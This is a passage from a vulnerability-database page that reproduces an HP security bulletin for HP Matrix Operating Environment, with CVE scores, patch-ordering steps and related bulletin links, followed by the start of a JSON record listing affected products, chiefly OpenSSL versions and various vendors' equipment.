Reference Base Vector Base Score CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 CVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9 CVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the vulnerabilities in the impacted versions of HP Matrix Operating Environment
HP Matrix Operating Environment 7.5.0 is only available on DVD. Please order the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components bundled with the HP Matrix Operating Environment in the following HP Security Bulletins.
HP Matrix Operating Environment component HP Security Bulletin Number Security Bulletin Location
HP Systems Insight Manager (SIM) HPSBMU03394 HPSBMU03394 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744
HP System Management Homepage (SMH) HPSBMU03380 http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490&la ng=en-us&cc=
HP Version Control Agent (VCA) HPSBMU03397 https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169
HP Version Control Repository Manager (VCRM) HPSBMU03396 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04765115
HP Virtual Connect Enterprise Manager (VCEM) SDK HPSBMU03413 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr _na-c04774021
HISTORY Version:1 (rev.1) - 24 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201501-0434", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "powerlinux 7r2", "scope": "eq", "trust": 1.2, "vendor": "ibm", "version": "0" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.3.5" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.2.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zc" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7200" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7700" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7800" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7100" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.1" }, { "model": "sparc enterprise m3000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.3" }, { "model": "ip38x/fw120", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "rev.11.03.08 before" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "sparc enterprise m5000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "tuning manager", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "software" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent 8.0" }, { "model": "sparc enterprise m9000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.2" }, { "model": "xcp", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "2260" }, { "model": "sparc enterprise m4000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 5.0" }, { "model": "ip38x/sr100", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.8.5" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.63" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle mobile security suite mss 3.0" }, { "model": "solaris", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "11.2" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.71" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent 8.0 2007 update release 2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r3" }, { "model": "ip38x/3000", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.0p" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r2" }, { "model": "ip38x/58i", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "solaris", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "10" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "3.0" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "xcp", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "(sparc enterprise m3000/m4000/m5000/m8000/m9000 server )" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0" }, { "model": "ip38x/1200", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.1" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.22 and earlier" }, { "model": "ip38x/3500", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.4" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.4" }, { "model": "ip38x/n500", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r1" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 10.0" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.3" }, { "model": "ip38x/1210", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "xcp", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "1120" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 5.1" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10 to 10.10.2" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1k" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1" }, { "model": "xcp", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "(fujitsu m10-1/m10-4/m10-4s server )" }, { "model": "sparc enterprise m8000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "ip38x/5000", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.1" }, { "model": "device manager", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "software" }, { "model": "ip38x/810", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "rev.11.01.21 before" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7400" }, { "model": "power express", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5200" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5700" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7300" }, { "model": "powerlinux 7r1", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "7.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.1" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.5" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "power system s822", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "bladecenter advanced management module 25r5778", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1948" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.00" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205635" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.6" }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.80" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "flex system p270 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)0" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6" }, { "model": "sparc enterprise m5000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power systems e870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22025850" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.50" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355042540" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "netezza platform software 7.0.4.7-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.2" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.1" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2.2" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.0" }, { "model": "cms", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "17.0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.2" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.0p", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "flex system p260 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)0" }, { "model": "netezza platform software 7.2.0.4-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "hunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "junos os 13.3r6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.19" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70104.1" }, { "model": "proxyav", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "prime security manager 04.8 qa08", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.70" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.21" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "netezza platform software 7.0.2.16-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cognos planning interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.4" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7" }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "netscaler t1", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0-68" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355041980" }, { "model": "power systems 350.c0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.842" }, { "model": "workflow for bluemix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5750" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "app for netapp data ontap", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": 